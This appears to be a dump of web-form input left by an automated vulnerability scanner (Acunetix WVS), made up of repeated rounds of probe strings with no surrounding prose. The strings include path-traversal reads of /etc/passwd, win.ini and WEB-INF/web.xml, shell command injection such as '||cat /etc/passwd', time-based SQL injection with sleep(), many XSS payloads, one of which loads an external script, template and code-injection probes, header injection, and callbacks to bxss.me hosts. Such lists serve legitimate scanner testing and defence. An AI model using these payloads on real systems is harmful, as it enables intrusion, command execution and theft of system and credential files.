!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

M1Z7EodD'

<a href='http://www.acunetix.com'>website security</a>

1

1

/etc/passwd

^(#$!@#$)(()))******

1

'

umwXzK6x')

'"()

'

[url=http://www.acunetix.com]website security[/url]

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

jmszgE2q'))

"

1

1

"

1

1_WxStV <ScRiPt >prompt(987317)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

http://hitm86ZZpBcqT.bxss.me/

1

1

1

1

1

................etc/passwd

-1)

&dir

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

-1))

http://www.acunetix.tst

comments

1

"&dir&"

1

1

1

3qhAVZoe'

1

file:///etc/passwd

1

comments

1

05rI2CXx')

'"

1'"()&%<ScRiPt >prompt(972933)</ScRiPt>

|dir

comments/.

/\../\../\../\../\../\../\../etc/passwd

He4Z2NL8'))

<!--

1

'"()&%<ScRiPt >prompt(953454)</ScRiPt>

1

'|dir

1

1

WEB-INF/web.xml

1

1_932982

1

1

1

1

"|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

acu9389<s1﹥s2ʺs3ʹuca9389

1

../../../../../../../../../../windows/win.ini.jpg

1

acux3064z1z2abcxuca3064

1

1<ScRiPt >prompt(954985)</ScRiPt>

windowswin.ini

1

1

1<script>prompt(930462)</script>

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(933902)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983774></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt >prompt(910699)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(972197)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969264)"></g></svg>

1

response.write(9545558*9490635)

1<div style=width:expression(prompt(921807))>

&cat /etc/passwd&

1

1

1

'+response.write(9545558*9490635)+'

1<iframe src='data:text/html

1

'&cat /etc/passwd&'

1

1

1<body onload=prompt(991561)>

"+response.write(9545558*9490635)+"

1

1

WEB-INF/web.xml

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947933)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(957665)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(975509)>

1

1

`cat /etc/passwd`

1

${99243+99217}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<ScRiPt%20>prompt(989748)</sCripT>

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1

-1

1&n950438=v942351

1&lt

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

<img acu onmouseover=prompt(930774) //>

)

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

-1)

1

1

1

1<input autofocus onfocus=prompt(972275)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

"|"ld

1

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

'"()

1

LDQKKh9C'

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

1

'

[url=http://www.acunetix.com]website security[/url]

WiSppYzN')

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

"

1

1_t6dTs <ScRiPt >prompt(926194)</ScRiPt>

fX70qI34'))

1

1

1

/etc/passwd

http://hit3HcsssSjsi.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

1

1

"

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

http://www.acunetix.tst

comments

1

'"

1

DHfLKCC3'

................etc/passwd

1'"()&%<ScRiPt >prompt(902167)</ScRiPt>

comments/.

<!--

'&dir&'

1

1

1

'"()&%<ScRiPt >prompt(994001)</ScRiPt>

OBZlGTra')

1

1

"&dir&"

1

1

1_930142

vDl1jL5V'))

1

1

file:///etc/passwd

1

|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

"|dir

acu4917<s1﹥s2ʺs3ʹuca4917

WEB-INF/web.xml

1

acux2999z1z2abcxuca2999

1

WEB-INF\web.xml

1

1

1<ScRiPt >prompt(954376)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1<script>prompt(955162)</script>

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(911062)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917276></ScRiPt>

windowswin.ini

1

1

1<ScRiPt >prompt(950009)</ScRiPt>

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(938974)">

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947883)"></g></svg>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<div style=width:expression(prompt(980111))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9416090*9791983)

1

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9416090*9791983)+'

1

1

1<body onload=prompt(941898)>

1

&cat /etc/passwd&

"+response.write(9416090*9791983)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903639)>

'&cat /etc/passwd&'

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(909760)>

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(9.42),0)/*'XOR(if(now()=sysdate(),sleep(9.42),0))OR'"XOR(if(now()=sysdate(),sleep(9.42),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(906774)>

1

1

(select(0)from(select(sleep(9.42)))v)/*'+(select(0)from(select(sleep(9.42)))v)+'"+(select(0)from(select(sleep(9.42)))v)+"*/

1

${100203+100005}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1<ScRiPt%20>prompt(979217)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1

|cat /etc/passwd#

1&n961804=v972189

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

1

1some_inexistent_file_with_long_name%00.jpg

-1)

)

<img acu onmouseover=prompt(950075) //>

1

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

!(()&&!|*|*|

1<input autofocus onfocus=prompt(962877)>

'"()

testasp.vulnweb.com

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

aZZ5n1UF'

^(#$!@#$)(()))******

1

'

1

1

1

82ONo6Q1')

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

1

1

"

1

cdYQ8dmS'))

1_M4SX6 <ScRiPt >prompt(930224)</ScRiPt>

1

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

1

1

1

"

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitIKoZBB5jpm.bxss.me/

1

1

||cat /etc/passwd

1

1

-1))

1

&dir

................etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

acunetix_wvs_invalid_filename

http://www.acunetix.tst

lHrFuL8D'

1

'&dir&'

comments

'"

1

1

comments

1

"&dir&"

IB0pBz0n')

1

<!--

1'"()&%<ScRiPt >prompt(997355)</ScRiPt>

file:///etc/passwd

1

1

comments/.

|dir

1

6vxjpkyJ'))

1

'"()&%<ScRiPt >prompt(966976)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

'|dir

1_922021

1

WEB-INF/web.xml

1

1

1

"|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu4583<s1﹥s2ʺs3ʹuca4583

1

windowswin.ini

acux4090z1z2abcxuca4090

1

1

1

................windowswin.ini

1<ScRiPt >prompt(931339)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(964653)</script>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(905317)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984224></ScRiPt>

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(927289)</ScRiPt>

1

1

1

response.write(9432821*9602363)

1<video><source onerror="javascript:prompt(990508)">

&cat /etc/passwd&

1

WEB-INF/web.xml

1

1

'+response.write(9432821*9602363)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980611)"></g></svg>

WEB-INF\web.xml

'&cat /etc/passwd&'

"+response.write(9432821*9602363)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

1

1

1<div style=width:expression(prompt(907450))>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

cat /etc/passwd

1

if(now()=sysdate(),sleep(6.5),0)/*'XOR(if(now()=sysdate(),sleep(6.5),0))OR'"XOR(if(now()=sysdate(),sleep(6.5),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(977562)>

1

`cat /etc/passwd`

1

1

1

1

(select(0)from(select(sleep(6.5)))v)/*'+(select(0)from(select(sleep(6.5)))v)+'"+(select(0)from(select(sleep(6.5)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910600)>

${99363+99634}

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

-1

1<img src=xyz OnErRor=prompt(912636)>

1

1

1&n917602=v987500

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1<img/src=">" onerror=alert(997293)>

1

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

-1))

1<ScRiPt%20>prompt(938116)</sCripT>

'"()

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

testasp.vulnweb.com

l84MAXXv'

1

1

^(#$!@#$)(()))******

1

1

<img acu onmouseover=prompt(903224) //>

'

59barmaH')

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

1

1<input autofocus onfocus=prompt(999784)>

1

CrHlXBVv'))

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

"

1

<a href='http://www.acunetix.com'>website security</a>

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

http://hitA6RX6PxScn.bxss.me/

||cat /etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1_4ovDq <ScRiPt >prompt(936719)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

-1))

comments

1

1

1

1

................etc/passwd

KbMli6Sp'

1

&dir

http://www.acunetix.tst

comments

1

'"

1

ovkyBXYp')

1'"()&%<ScRiPt >prompt(972172)</ScRiPt>

1

<!--

comments/.

1

1

kjTKRNg4'))

1

1

1

'"()&%<ScRiPt >prompt(947733)</ScRiPt>

file:///etc/passwd

'&dir&'

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1_915986

1

1

WEB-INF/web.xml

|dir

1

1

1

WEB-INF\web.xml

'|dir

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

acu5330<s1﹥s2ʺs3ʹuca5330

../../../../../../../../../../boot.ini

1

acux6672z1z2abcxuca6672

1

1<ScRiPt >prompt(993380)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(980427)</script>

windowswin.ini

1

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(987055)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962541></ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(932390)</ScRiPt>

response.write(9097148*9069905)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(996744)">

1

1

1

1

'+response.write(9097148*9069905)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978034)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

"+response.write(9097148*9069905)+"

&cat /etc/passwd&

1

1

1<div style=width:expression(prompt(912881))>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

1

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

"&cat /etc/passwd&"

1

1<body onload=prompt(988498)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

${100168+99131}

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986613)>

cat /etc/passwd

-1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<img src=xyz OnErRor=prompt(948254)>

`cat /etc/passwd`

-1)

1

1some_inexistent_file_with_long_name%00.jpg

1&n931380=v997473

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

-1))

1

1<img/src=">" onerror=alert(938157)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

'"()

1

1<ScRiPt%20>prompt(920144)</sCripT>

nMxpk7C8'

testasp.vulnweb.com

^(#$!@#$)(()))******

1

gzt9oJUA')

1

.\./.\./.\./.\./.\./.\./etc/passwd

"|"ld

1&lt

1

1

1

zXSBaKYO'))

1

1

<img acu onmouseover=prompt(934708) //>

'

1

/etc/passwd

1

1

'

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(944021)>

"

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

-1)

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

http://hitkOFsTyHbDm.bxss.me/

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

1

acunetix_wvs_invalid_filename

1

1

&dir

i7mVAZCC'

................etc/passwd

1

1

1

UmfE4rF3')

comments

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1_8flI1 <ScRiPt >prompt(943090)</ScRiPt>

comments

'"

1

I5x1QTQV'))

1

file:///etc/passwd

1

"&dir&"

1

comments/.

<!--

1

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(987617)</ScRiPt>

1

|dir

1

1

1

'"()&%<ScRiPt >prompt(944327)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1_973041

'|dir

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu8113<s1﹥s2ʺs3ʹuca8113

1

1

windowswin.ini

1

1

1

acux10774z1z2abcxuca10774

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(924041)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<script>prompt(909230)</script>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(962151)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958786></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9684689*9169918)

1<ScRiPt >prompt(941281)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(960069)">

'+response.write(9684689*9169918)+'

WEB-INF/web.xml

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969912)"></g></svg>

"+response.write(9684689*9169918)+"

1

WEB-INF\web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(928162))>

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1<body onload=prompt(943697)>

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(9.423),0)/*'XOR(if(now()=sysdate(),sleep(9.423),0))OR'"XOR(if(now()=sysdate(),sleep(9.423),0))OR"*/

`cat /etc/passwd`

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(971004)>

1

${99552+99418}

1

1

|cat /etc/passwd#

(select(0)from(select(sleep(9.423)))v)/*'+(select(0)from(select(sleep(9.423)))v)+'"+(select(0)from(select(sleep(9.423)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(991070)>

1

1

1

'|'ld

1&n933678=v949387

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(904196)>

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1

"|"ld

1

/etc/passwd

-1))

1<ScRiPt%20>prompt(908789)</sCripT>

!(()&&!|*|*|

1

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'"()

zHHpBSvI'

1

1&lt

^(#$!@#$)(()))******

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

1

jxEbZCRt')

'

1

1

<img acu onmouseover=prompt(998357) //>

"

................etc/passwd

"

1

1

1

t9O47KTU'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(914439)>

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

file:///etc/passwd

<a href='http://www.acunetix.com'>website security</a>

http://hite5Ix2UWMBi.bxss.me/

acunetix_wvs_invalid_filename

&dir

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

[url=http://www.acunetix.com]website security[/url]

comments

/\../\../\../\../\../\../\../etc/passwd

1

-1))

1

'&dir&'

1

1

1

1_AKpKT <ScRiPt >prompt(959832)</ScRiPt>

WEB-INF/web.xml

comments

http://www.acunetix.tst

lFgVNcy4'

1

'"

1'"()&%<ScRiPt >prompt(962010)</ScRiPt>

"&dir&"

1

comments/.

WEB-INF\web.xml

1

8VTa8uTD')

1

1

<!--

1

'"()&%<ScRiPt >prompt(939422)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

|dir

1

Fie65iA5'))

1

1

1

1

1_929197

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1

1

1

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acu4940<s1﹥s2ʺs3ʹuca4940

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

acux3469z1z2abcxuca3469

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(971159)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<script>prompt(969329)</script>

1

1

1

1

1

1<ScRiPt >prompt(959759)</ScRiPt>

WEB-INF/web.xml

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900991></ScRiPt>

1

1

WEB-INF\web.xml

1

1

response.write(9510271*9694827)

1<ScRiPt >prompt(929157)</ScRiPt>

1

1

1

1

1

'+response.write(9510271*9694827)+'

1<video><source onerror="javascript:prompt(942667)">

1

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901777)"></g></svg>

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

"+response.write(9510271*9694827)+"

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(972947))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

${100277+99372}

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

cat /etc/passwd

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(6.22),0)/*'XOR(if(now()=sysdate(),sleep(6.22),0))OR'"XOR(if(now()=sysdate(),sleep(6.22),0))OR"*/

1

1<body onload=prompt(990983)>

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1&n961181=v953561

`cat /etc/passwd`

(select(0)from(select(sleep(6.22)))v)/*'+(select(0)from(select(sleep(6.22)))v)+'"+(select(0)from(select(sleep(6.22)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983312)>

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(917442)>

testasp.vulnweb.com

!(()&&!|*|*|

1

1

-1)

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1<img/src=">" onerror=alert(931436)>

1

'"()

^(#$!@#$)(()))******

1

"|"ld

-1))

.\./.\./.\./.\./.\./.\./etc/passwd

1

"

1<ScRiPt%20>prompt(904973)</sCripT>

1

1

1

1

6mLzKAxt'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1&lt

${@print(md5(acunetix_wvs_security_test))}

1

1

1

<img acu onmouseover=prompt(910929) //>

'

1

O39rp6Yx')

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(933725)>

1

http://hitvWAp1LawLl.bxss.me/

dZyGH1NY'))

1

acunetix_wvs_invalid_filename

"

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

-1

comments

1

1

................etc/passwd

1

1

http://www.acunetix.tst

-1)

comments

[url=http://www.acunetix.com]website security[/url]

1'"()&%<ScRiPt >prompt(951404)</ScRiPt>

'"

1

1

-1))

<!--

1_okMeo <ScRiPt >prompt(904418)</ScRiPt>

1

comments/.

'"()&%<ScRiPt >prompt(951653)</ScRiPt>

||cat /etc/passwd

1

file:///etc/passwd

1

dvyvXZQf'

1

1

1

1_998878

&dir

/\../\../\../\../\../\../\../etc/passwd

1

0vro3xhy')

1

1

1

1

'&dir&'

WEB-INF/web.xml

S9SwmgqQ'))

1

"&dir&"

WEB-INF\web.xml

1

1

1

|dir

../../../../../../../../../../windows/win.ini

acu7887<s1﹥s2ʺs3ʹuca7887

1

1

1

acux8500z1z2abcxuca8500

'|dir

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(923858)</ScRiPt>

"|dir

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(966951)</script>

1

1

windowswin.ini

1

1

1<ScRiPt >prompt(985281)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917480></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(972887)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(946750)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934664)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9291128*9157018)

1

1

1<div style=width:expression(prompt(933470))>

1

'+response.write(9291128*9157018)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1<iframe src='data:text/html

1

1

"+response.write(9291128*9157018)+"

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(921363)>

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938273)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=xyz OnErRor=prompt(925466)>

WEB-INF\web.xml

1

cat /etc/passwd

